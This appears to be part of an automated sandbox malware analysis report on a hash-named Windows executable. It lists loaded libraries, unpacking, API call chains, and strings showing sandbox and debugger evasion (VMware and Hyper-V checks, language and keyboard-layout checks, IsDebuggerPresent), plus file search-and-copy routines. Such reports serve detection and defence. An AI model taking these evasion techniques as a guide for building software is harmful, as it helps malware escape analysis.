                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeUnpacked PE file: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.dol:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeUnpacked PE file: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exeStatic PE information: section name: .dol
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D0B29C push ecx; ret 0_2_02D0B2AF
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CF0F59 pushfd ; iretd 0_2_02CF1078
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02E8FA9B push FFFFFFAEh; retf 0_2_02E8FAA7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02E8FFEA pushad ; retf 0_2_02E8FFEB
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02E8B3EB push 7DD07DC0h; iretd 0_2_02E8B3FC
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02E8E3CA push eax; ret 0_2_02E8E3D9
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02E8FFA6 pushad ; retf 0_2_02E8FFA8
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02E8E3BB push eax; ret 0_2_02E8E3D9
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02E8A8E5 pushfd ; iretd 0_2_02E8A8E8
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exeStatic PE information: section name: .text entropy: 7.495326182378619
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26696
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeEvaded block: after key decisiongraph_0-27857
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeAPI coverage: 6.5 %
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_02CFE697
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D047D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_02D047D7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_02CFEF87
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D04B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02D04B77
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D03B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_02D03B17
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_02CFC0D7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_02CFDCE7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02CFE077
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D04107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_02D04107
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02CFF917
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CF1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02CF1937
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: Amcache.hve.5.drBinary or memory string: VMware
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                      Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareC>M
                      Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                      Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd
                      Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeAPI call chain: ExitProcess graph end nodegraph_0-26681
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeAPI call chain: ExitProcess graph end nodegraph_0-28095
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeAPI call chain: ExitProcess graph end nodegraph_0-26684
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeAPI call chain: ExitProcess graph end nodegraph_0-26703
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeAPI call chain: ExitProcess graph end nodegraph_0-26523
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeAPI call chain: ExitProcess graph end nodegraph_0-26695
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeAPI call chain: ExitProcess graph end nodegraph_0-26569
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeAPI call chain: ExitProcess graph end nodegraph_0-26724
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CF0D90 mov eax, dword ptr fs:[00000030h]0_2_02CF0D90
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D099B7 mov eax, dword ptr fs:[00000030h]0_2_02D099B7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CF092B mov eax, dword ptr fs:[00000030h]0_2_02CF092B
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02E896BB push dword ptr fs:[00000030h]0_2_02E896BB
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D0AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02D0AFAF
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D0B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02D0B5A1
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D0D151 SetUnhandledExceptionFilter,0_2_02D0D151
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe PID: 7652, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D09867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_02D09867
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_02D07DF7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
